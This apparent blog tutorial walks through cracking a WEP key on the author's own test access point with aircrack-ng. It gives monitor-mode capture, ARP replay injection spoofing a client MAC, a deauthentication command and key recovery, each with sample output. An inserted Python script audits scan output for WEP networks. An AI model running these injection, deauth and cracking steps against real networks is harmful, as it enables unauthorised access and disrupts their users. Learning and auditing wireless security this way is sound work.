Yeah...I know. It's pointless to post this, as there shouldn't be any WEP networks in use out there. But for completeness, let's go through it anyway.
If you have read the article Basic WPA cracking and the article Manual Wlan config, let's go into legacy mode for a minute and look at WEP.

What's the point, you ask? Weeeeell, in these C-days I'm bored and needed something to do. So without further delay, let's get to it :)


We're gonna need a client on the network, and an access point that can run WEP. Most APs can, almost no matter how old they are, so that's not a problem.
Next, we need a Wifi card that can do injection. For this tutorial, the setup is as follows.

The AP BSSID is 00:23:69:2F:6B:F5 and the ESSID is linksys. The password (WEP key) is 1234567890. Yeah, I know. Not a good password, but since this is just a test, it doesn't really matter.
The client is 2C:FD:AB:E0:0D:AB, a Lenovo tablet, set up on the network.

So, we have everything. But how do we do this? What steps do we need? Since we have a client, we can simply run an ARP replay attack using Aircrack-ng. Pretty basic, and easy to do.
We need three terminal windows to set up the attack, some coffee, and some patience. By patience I mean an attention span of 15 minutes should suffice :)

The first thing we need is to put the network card in monitor mode, so we can identify the network and see what we've got. We do that with this command (wlanx is your wireless interface; the monitor interface it creates is called wlan0mon below).

airmon-ng start wlanx

Next, when that's running and shows us the networks around us, we need to lock onto the target network. We do that with this command.

airodump-ng -d 00:23:69:2F:6B:F5 -c 11 -w linksysdump_wep wlan0mon

Notice the -d switch: that's the AP's MAC, so airodump-ng only follows that BSSID. The -c switch is the channel, here 11. And finally, -w writes a dump file for the cracker to work with, using the prefix linksysdump_wep; airodump-ng numbers its output files, so it ends up as linksysdump_wep-01.cap.
We need that file for the cracker later on, that's why we save it.

Next, we see something like this in our terminal.

 CH 11 ][ Elapsed: 16 mins ][ 2020-04-07 18:56 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:23:69:2F:6B:F5  -46  81     8143    31838    1  11   54   WEP  WEP    SKA  linksys                                

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 00:23:69:2F:6B:F5  2C:FD:AB:E0:0D:AB  -25   54 - 6      0    49495         linksys 

That tells us our sniffer is working. Note ENC=WEP and CIPHER=WEP. The "#Data" column is the one we need to keep an eye on. For a start, it won't rise very quickly, since we don't have any client connected.
If we have one, it still won't rise very quickly, because the client isn't doing much. If it's streaming audio or video, the data count will rise a bit faster, but not much. Since we need a lot of data collected to crack the key, what do we do?
Well, we can inject data and force the AP to send data back; that way our traffic rises, and then we can crack the key.
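As an added example (not part of the original post), here is a small Python audit script that parses the airodump-ng screen layout shown above and reports every WEP network together with the clients attached to it. On the defending side, the same scan is what you run to find WEP still in use on your own premises and get it migrated. The sample scan text is constructed from the post's table, with a made-up WPA2 row added so that the filter has something to ignore; the column order assumed is the one in the table above, and the parser is mine, not part of the aircrack-ng suite.

```python
"""Audit an airodump-ng style scan for WEP networks and their clients."""
import re
from dataclasses import dataclass, field

# Constructed sample in the on-screen layout airodump-ng prints: first the
# access-point table, then the station table. The WEP row is the post's
# own; the WPA2 row and its station are made up for contrast.
SAMPLE_SCAN = """\
 CH 11 ][ Elapsed: 16 mins ][ 2020-04-07 18:56

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 00:23:69:2F:6B:F5  -46  81     8143    31838    1  11   54   WEP  WEP    SKA  linksys
 AA:BB:CC:DD:EE:01  -60  70     1200      450    0   6   54   WPA2 CCMP   PSK  office

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 00:23:69:2F:6B:F5  2C:FD:AB:E0:0D:AB  -25   54 - 6      0    49495         linksys
 AA:BB:CC:DD:EE:01  11:22:33:44:55:66  -40   54 - 6      3      120         office
"""

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"

# Access-point row: BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
AP_LINE = re.compile(
    rf"^\s*(?P<bssid>{MAC})\s+(?P<pwr>-?\d+)\s+(?P<rxq>\d+)\s+(?P<beacons>\d+)\s+"
    rf"(?P<data>\d+)\s+(?P<rate>\d+)\s+(?P<ch>\d+)\s+(?P<mb>\S+)\s+"
    rf"(?P<enc>\S+)\s+(?P<cipher>\S+)\s+(?P<auth>\S+)\s+(?P<essid>\S.*?)\s*$"
)
# Station row: BSSID STATION PWR Rate Lost Frames ... (rate looks like "54 - 6")
STA_LINE = re.compile(
    rf"^\s*(?P<bssid>{MAC})\s+(?P<station>{MAC})\s+(?P<pwr>-?\d+)\s+"
    rf"(?P<rate>\S+\s*-\s*\S+)\s+(?P<lost>\d+)\s+(?P<frames>\d+)"
)


@dataclass
class AccessPoint:
    bssid: str
    essid: str
    channel: int
    enc: str
    cipher: str
    auth: str
    data_frames: int
    clients: list = field(default_factory=list)  # (station MAC, frames)


def parse_scan(text):
    """Return {bssid: AccessPoint} with attached stations filled in."""
    aps = {}
    stations = []
    for line in text.splitlines():
        m = AP_LINE.match(line)
        if m:
            bssid = m["bssid"].upper()
            aps[bssid] = AccessPoint(
                bssid=bssid, essid=m["essid"], channel=int(m["ch"]),
                enc=m["enc"], cipher=m["cipher"], auth=m["auth"],
                data_frames=int(m["data"]))
            continue
        m = STA_LINE.match(line)
        if m:  # rows for unassociated stations carry no BSSID and are skipped
            stations.append((m["bssid"].upper(), m["station"].upper(), int(m["frames"])))
    for bssid, station, frames in stations:
        if bssid in aps:
            aps[bssid].clients.append((station, frames))
    return aps


def audit_wep(text):
    """List every WEP network in the scan, with its attached clients."""
    findings = []
    for ap in parse_scan(text).values():
        if ap.enc.upper() != "WEP":
            continue
        findings.append({
            "bssid": ap.bssid,
            "essid": ap.essid,
            "channel": ap.channel,
            "shared_key_auth": ap.auth.upper() == "SKA",
            "clients": [sta for sta, _ in ap.clients],
        })
    return findings


def report(text):
    """Human-readable summary of audit_wep(), one network per line."""
    lines = []
    for f in audit_wep(text):
        lines.append(f"WEP network {f['essid']!r} ({f['bssid']}, ch {f['channel']}): "
                     f"{len(f['clients'])} client(s) attached"
                     + (", shared-key auth" if f["shared_key_auth"] else ""))
        lines.extend(f"  - client {c}" for c in f["clients"])
    return "\n".join(lines) or "no WEP networks found"


if __name__ == "__main__":
    print(report(SAMPLE_SCAN))
```

Each WEP finding lists the attached client MACs, because those are the devices that still need to be migrated along with the AP; the shared-key-auth flag is worth keeping since SKA, as in the post's scan, is the weaker of the two WEP authentication modes.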
But how do we do that? Well, keep airodump-ng running and open another terminal. We need to run aireplay-ng to force the traffic up. We do that with the command

aireplay-ng --arpreplay -b 00:23:69:2F:6B:F5 -h 2C:FD:AB:E0:0D:AB wlan0mon

The -b switch is the AP's MAC, the -h switch is the MAC address of the client we're spoofing, and lastly we give our monitor interface, wlan0mon.
If it's working, you'll see something like this in aireplay's window, telling you that injection is running. If you do, keep it running and watch the airodump window. You should see the data count beginning to speed up.

The interface MAC (00:13:EF:F1:03:69) doesn't match the specified MAC (-h).
	ifconfig wlan0mon hw ether 2C:FD:AB:E0:0D:AB
18:47:45  Waiting for beacon frame (BSSID: 00:23:69:2F:6B:F5) on channel 11
Saving ARP requests in replay_arp-0407-184746.cap
You should also start airodump-ng to capture replies.
Read 1011 packets (got 107 ARP requests and 71 ACKs), sent 597 packets...
Read 1342 packets (got 131 ARP requests and 84 ACKs), sent 647 packets...
Read 1696 packets (got 156 ARP requests and 96 ACKs), sent 698 packets...
Read 1994 packets (got 185 ARP requests and 113 ACKs), sent 748 packets...
Read 2148 packets (got 203 ARP requests and 124 ACKs), sent 797 packets...
Read 2287 packets (got 227 ARP requests and 137 ACKs), sent 847 packets...
Read 2371 packets (got 259 ARP requests and 155 ACKs), sent 898 packets...
Read 2463 packets (got 286 ARP requests and 169 ACKs), sent 947 packets...

If it's NOT, that is, if the data count isn't picking up speed, try to kick the client off the network so it reassociates, and see if that works. You do that in a new terminal window with the command

aireplay-ng -0 1 -a AP_MAC -c CLIENT_MAC monitor_interface


If the data's getting up to speed, let's get cracking. Time for aircrack-ng to do its job. We need at least 5000 IVs, so wait for the data column to read 5000 before you start the cracker. We start the cracking process with the command

aircrack-ng -a 1 -b 00:23:69:2F:6B:F5 linksysdump_wep-01.cap


The -a switch is the attack mode (1 means WEP), -b is the BSSID (the AP's MAC), and lastly we give the cracker our dump .cap file to read data from.

Simply let it run. If it bitches about not having enough IVs, try running the command again at 10000, 15000 and 20000 IVs, and keep trying every 5000-10000 IVs after that. When it has got the right key, it shows something like this

                               Aircrack-ng 1.6 


                 [00:00:05] Tested 34585 keys (got 27266 IVs)

   KB    depth   byte(vote)
    0    0/  1   12(43776) 7C(35072) 0C(33536) C1(32768) D0(32768) 
    1    0/  3   34(38656) 2A(34816) 67(34304) 10(33792) 57(33792) 
    2   22/ 25   BD(30976) 57(30720) 9C(30720) 0B(30464) B6(30464) 
    3    0/ 20   78(35584) 38(34048) DB(33536) 33(33536) 40(32256) 
    4   23/ 24   90(30976) 0A(30720) 10(30720) 17(30720) 90(30720) 

                         KEY FOUND! [ 12:34:56:78:90 ] 
	Decrypted correctly: 100%

That's all there is to it. Here it took around 15 minutes for the entire process. As long as you get injection to work, it's only a matter of time before you can crack the key. That's why WEP really shouldn't be used anymore :)

Happy cracking, and as always...do stay off your neighbours' Wifi :)
